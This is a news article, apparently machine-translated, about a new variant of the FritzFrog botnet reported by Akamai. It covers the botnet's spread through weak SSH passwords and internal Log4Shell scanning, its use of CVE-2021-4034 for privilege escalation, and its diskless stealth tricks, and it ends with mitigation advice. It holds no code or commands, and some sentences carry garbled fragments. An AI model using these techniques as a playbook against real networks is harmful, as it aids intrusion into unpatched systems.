A new variant of an advanced botnet called “FritzFrog” is spreading via Log4Shell.
It has been more than two years since the critical vulnerability in Log4j was discovered first unleashed on this earth, yet the aggressors are still making good use of itAS many organizations remain unpatched. Particularly, it seems, in the supposedly safe areas of their networks.
Unlike most Log4Shell attacks, FritzFrog, a Golang-based peer-to-peer botnet, does not target Internet-connected systems and services. Its trick, rather, is to seek out and spread the same vulnerability in internal network resources that organizations are less likely to have fixed.
And Log4Shell is just one of FritzFrog’s new tricks. “It appears that, for developers, this is an ongoing project: they are adapting it over time,” explains Ori David, a security researcher at Akamai, author of a report published on February 1. botnets.”
How FritzFrog spreads
Historically, FritzFrog loves to infect networks by brutally cracking Internet-facing servers with weak SSH passwords. The new variant builds on this tactic by reading multiple system logs on compromised hosts, with the aim of identifying multiple potentially weak targets to spread to in a network.
In addition to weak passwords, it also scans for Log4Shell openings these days.
“It will compromise a resource in your environment by finding a weak SSH password, then it will scan your entire internal network and find vulnerable apps that would not be exposed to normal Log4Shell attacks,” David explains, referring to web-based attacks.
As he wrote in his report, the strategy works so well because “When the vulnerability was first discovered, Internet-facing applications were given priority for patching due to their significant risk of compromise. Al Conversely, internal machines, which were less likely to be exploited, were often neglected and remained unpatched, a circumstance of which FritzFrog takes advantage.”
The other new tricks from FritzFrog
Improved network scanning and Log4Shell exploitation are just two of FritzFrog’s latest updates.
To make privilege escalation a breeze, he is now exploiting CVE-2021-4034, the “high” memory corruption vulnerability rated CVSS 7.8 out of 10 in Polkit. Although two years have passed since its disclosure, this trivial flaw to exploit is probably very widespread since Polkit is installed by default in most Linux distributions.
The developers of FritzFrog also put a lot of thought into stealth. In addition to TOR support and an “antivirus” module that kills unrelated malware on a system, the new variant makes use of two aspects of Linux: the /dev/shm shared memory folder and the memfd_create function, which creates anonymous files stored in RAM. The goal of each is to reduce the risk of detection by avoiding touching the disk.
These tricks, among others, have contributed to the botnet’s more than 20,000 attacks against more than 1,500 victims since its first detection in 2020.
But for widespread malware with such different weapons at its disposal, David says, its kryptonite is awfully simple: “FritzFrog propagates in two ways: weak SSH passwords and Log4Shell. So the best way to mitigate it would be to have good passwords, and for patch your systems.”